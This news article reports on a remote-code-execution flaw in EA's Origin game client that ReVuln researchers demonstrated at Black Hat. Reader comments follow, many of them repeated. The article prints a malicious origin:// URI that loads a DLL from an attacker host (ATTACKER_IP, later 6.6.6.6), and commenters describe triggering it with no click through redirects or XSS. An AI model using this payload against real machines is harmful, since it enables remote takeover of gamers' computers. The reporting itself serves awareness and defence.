Millions could be at risk of exploits that use Origin to execute malicious code.

More than 40 million people could be affected by a vulnerability researchers uncovered in EA's Origin online game platform allowing attackers to remotely execute malicious code on players' computers.

The attack, demonstrated on Friday at the Black Hat security conference in Amsterdam, takes just seconds to execute. In some cases, it requires no interaction by victims, researchers from Malta-based ReVuln (@revuln) told Ars. It works by manipulating the uniform resource identifiers EA's site uses to automatically start games on an end user's machine. By exploiting flaws in the Origin application available for both Macs and PCs, the technique turns EA's popular game store into an attack platform that can covertly install malware on customers' computers.

"The Origin platform allows malicious users to exploit local vulnerabilities or features by abusing the Origin URI handling mechanism," ReVuln researchers Donato Ferrante and Luigi Auriemma wrote in a paper accompanying last week's demonstration. "In other words, an attacker can craft a malicious Internet link to execute malicious code remotely on [a] victim's system, which has Origin installed."

The researchers' demo shows them taking control of a computer that has the Origin client and Crysis 3 game installed. Behind the scenes, the EA platform uses the origin://LaunchGame/71503 link to activate the game. When a targeted user instead clicks on a URI such as origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, the Origin client will load a Windows dynamic link library file of the attackers' choosing on the victim's computer.

Update: "Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure," an EA spokesman wrote in an e-mail to Ars.

The attack is similar to an exploit the same researchers demonstrated in October on Steam, a competing online game platform from Valve, with 50 million users. The earlier attack relied on booby-trapped URLs starting with "Steam://" to trick browsers, games, e-mail clients, and other applications into executing code that could compromise the security of the underlying computer. At the time, the researchers advised vulnerable end users to protect themselves against exploits by disabling the automatic launching of Steam:// URLs.

The Origin attack works much the same. It exploits the functionality that allows sites to start games remotely. By modifying the variables in the underlying URI links, the commands to start a game can be replaced with instructions that cause a computer to install a malicious program instead. One such command, which was included in the demo, is related to the OpenAutomate standard used in software provided with graphics cards from Nvidia. The technique works against people who have installed Crysis 3 and a variety of other games. Other techniques work against machines with different titles installed.

When an origin:// link is opened for the first time, browsers will typically ask if a user wants it to open in the Origin client, which is the registered application for such URLs. Different browsers handle these links differently, with some displaying full paths, others showing only parts of them, and still others not displaying the URL at all. Some confirmation prompts give users the option of using the Origin client to open all origin:// links encountered in the future. Many gamers choose this setting so they aren't prompted in the future. Those users who have selected this setting may not be required to take any interaction to be attacked. Users who want to protect themselves should make sure they are prompted before Origin links are processed.

Promoted Comments

This isn't what I would consider an esoteric security vulnerability, so much as a basic issue with URI handlers. It makes whatever application essentially a browser plugin, because once you click the "handle all future links" option (or whatever it is in your browser of choice), you have then opened up a "trusted" path between the internet and the handler in question. Having seen it with Steam, as was mentioned in the article, and also now Origin, I have a feeling that there are plenty more handlers out there with significant issues that are simply more niche than Origin or Steam.

I'm not trying to excuse it or say it doesn't matter, just that one should always be careful when choosing to treat all future links in the same way, regardless of the handler. It's annoying, but if you set it so that you have to approve the link every time, it means you will notice when something does it unexpectedly, and might not click "yes".

Origin also needs to clean up their handling to not allow arbitrary downloads and execution, but I suspect that there will always be some risk, especially if parameters can be passed to the game being executed (which makes every game on Origin/Steam/whatever an indirect risk).

I thought DRM didn't affect honest, paying customers. I'm shocked that forcing people to install DRM software in order to play games increases the surface area for attacks and degrades the user experience.

This isn't what I would consider an esoteric security vulnerability, so much as a basic issue with URI handlers. It makes whatever application essentially a browser plugin, because once you click the "handle all future links" option (or whatever it is in your browser of choice), you have then opened up a "trusted" path between the internet and the handler in question. Having seen it with Steam, as was mentioned in the article, and also now Origin, I have a feeling that there are plenty more handlers out there with significant issues that are simply more niche than Origin or Steam.

I'm not trying to excuse it or say it doesn't matter, just that one should always be careful when choosing to treat all future links in the same way, regardless of the handler. It's annoying, but if you set it so that you have to approve the link every time, it means you will notice when something does it unexpectedly, and might not click "yes".

Origin also needs to clean up their handling to not allow arbitrary downloads and execution, but I suspect that there will always be some risk, especially if parameters can be passed to the game being executed (which makes every game on Origin/Steam/whatever an indirect risk).

I thought DRM didn't affect honest, paying customers. I'm shocked that forcing people to install DRM software in order to play games increases the surface area for attacks and degrades the user experience.

This has nothing to do with DRM. This has to do with Origin. If Origin was just an app that let you download and manage your library of DRM-free games, this bug would still be present.

This has nothing to do with DRM. This has to do with Origin. If Origin was just an app that let you download and manage your library of DRM-free games, this bug would still be present.

Security issues with URI handlers are literally commonplace.

If it were just an app you download to manage your games, you could play the games without downloading this app, or at least uninstall it when the vulnerability is announced, to protect yourself. But because it's DRM, you're stuck with it. Thus, DRM increases the surface area for attacks and degrades the user experience more than an independent app.

This has nothing to do with DRM. This has to do with Origin. If Origin was just an app that let you download and manage your library of DRM-free games, this bug would still be present.

Security issues with URI handlers are literally commonplace.

If it were just an app you download to manage your games, you could play the games without downloading this app, or at least uninstall it when the vulnerability is announced, to protect yourself. But because it's DRM, you're stuck with it. Thus, DRM increases the surface area for attacks and degrades the user experience more than an independent app.

You could just as easily prevent your computer from doing anything with origin:// links. Once you know it's a problem, it's pretty easy to avoid, which is true of every application that can execute something.

Also, from the article, " it requires no interaction by victims" - doesn't it require them to at least click a link? While seemingly minor, there's a massive difference between an exploit that can be exploited without any interaction by the victims (I'd be running home to uninstall Origin right now) and one that at least involves them to stumble across a URI and click on it.

edit: Plus "the Origin client will load a Windows dynamic link library file of the attackers' choosing on the victim's computer.", that doesn't seem terribly risky to me, I don't have evil.dll on my computer already. Or is there a way to get evil.dll there? edit2: Whoops, somehow missed the "Attacker IP" part in the article on my first read through

It's really pretty funny that I would put more trust in skidrow cracked games than anything that the publishers release. And even more funny that they often have releases out before the actual game.

Every time I buy an ubi game I kick myself again for not pirating it. Bought Assasins Creed 3 on sale last night and after fighting with uplay and eventually having to uninstall it and reboot my system, and then reinstall it again to even get the game to launch, I asked myself "Wait a minute, didn't I learn this last time with Far Cry 3?? why didn't I just pirate this."

You could just as easily prevent your computer from doing anything with origin:// links. Once you know it's a problem, it's pretty easy to avoid, which is true of every application that can execute something.

It's unreasonable to expect most people to analyze every bit of software for vulnerabilities like this and take the necessary measures to prevent them. The software should be secure in its and the OS's defalut state.

Also, from the article, " it requires no interaction by victims" - doesn't it require them to at least click a link? While seemingly minor, there's a massive difference between an exploit that can be exploited without any interaction by the victims (I'd be running home to uninstall Origin right now) and one that at least involves them to stumble across a URI and click on it.

An attacker could use the HTTP `Location` header to instruct the browser to have the system launch just any URI. This means that depending on the browser, a booby-trapped image, frame or link could be enough.

This has nothing to do with DRM. This has to do with Origin. If Origin was just an app that let you download and manage your library of DRM-free games, this bug would still be present.

Security issues with URI handlers are literally commonplace.

If it were just an app you download to manage your games, you could play the games without downloading this app, or at least uninstall it when the vulnerability is announced, to protect yourself. But because it's DRM, you're stuck with it. Thus, DRM increases the surface area for attacks and degrades the user experience more than an independent app.

You could just as easily prevent your computer from doing anything with origin:// links. Once you know it's a problem, it's pretty easy to avoid, which is true of every application that can execute something.

Also, from the article, " it requires no interaction by victims" - doesn't it require them to at least click a link? While seemingly minor, there's a massive difference between an exploit that can be exploited without any interaction by the victims (I'd be running home to uninstall Origin right now) and one that at least involves them to stumble across a URI and click on it.

edit: Plus "the Origin client will load a Windows dynamic link library file of the attackers' choosing on the victim's computer.", that doesn't seem terribly risky to me, I don't have evil.dll on my computer already. Or is there a way to get evil.dll there?

In the article, it referenced the attacker's IP, as in "\\6.6.6.6\evil.dll"

You could just as easily prevent your computer from doing anything with origin:// links. Once you know it's a problem, it's pretty easy to avoid, which is true of every application that can execute something.

It's unreasonable to expect most people to analyze every bit of software for vulnerabilities like this and take the necessary measures to prevent them. The software should be secure in its and the OS's defalut state.

You said

Quote:

you could play the games without downloading this app, or at least uninstall it when the vulnerability is announced

I was responding to that. There are plenty of DRM free game downloaders, like GOG's, that would be open to the same kind of attack. The user would have to know about the vulnerability and uninstall it to protect themselves.

Alex777 wrote:

In the article, it referenced the attacker's IP, as in "\\6.6.6.6\evil.dll"

Thanks, I somehow completely missed that reading through it and thought "on the users computer" meant a file already there

This has nothing to do with DRM. This has to do with Origin. If Origin was just an app that let you download and manage your library of DRM-free games, this bug would still be present.

Security issues with URI handlers are literally commonplace.

If it were just an app you download to manage your games, you could play the games without downloading this app, or at least uninstall it when the vulnerability is announced, to protect yourself. But because it's DRM, you're stuck with it. Thus, DRM increases the surface area for attacks and degrades the user experience more than an independent app.

You could just as easily prevent your computer from doing anything with origin:// links. Once you know it's a problem, it's pretty easy to avoid, which is true of every application that can execute something.

Also, from the article, " it requires no interaction by victims" - doesn't it require them to at least click a link? While seemingly minor, there's a massive difference between an exploit that can be exploited without any interaction by the victims (I'd be running home to uninstall Origin right now) and one that at least involves them to stumble across a URI and click on it.

edit: Plus "the Origin client will load a Windows dynamic link library file of the attackers' choosing on the victim's computer.", that doesn't seem terribly risky to me, I don't have evil.dll on my computer already. Or is there a way to get evil.dll there?

This attack could be easily be paired with something like a XSS exploit to bypass the need for a user click. I agree that this isn't a particularly serious vulnerability, given that it can be mitigated pretty easily as you mention.

However, I think you missing Solomonoff's point: Origin is DRM and users that want to play their games are *forced* to deal with it's associated URI handling issues. There is no way for someone to opt out of the system, regardless of the security concerns that it presents, without loosing access to software that they paid for. Users of the GOG manager, for instance, are not hampered by that requirement and could bail if they felt the system were flawed.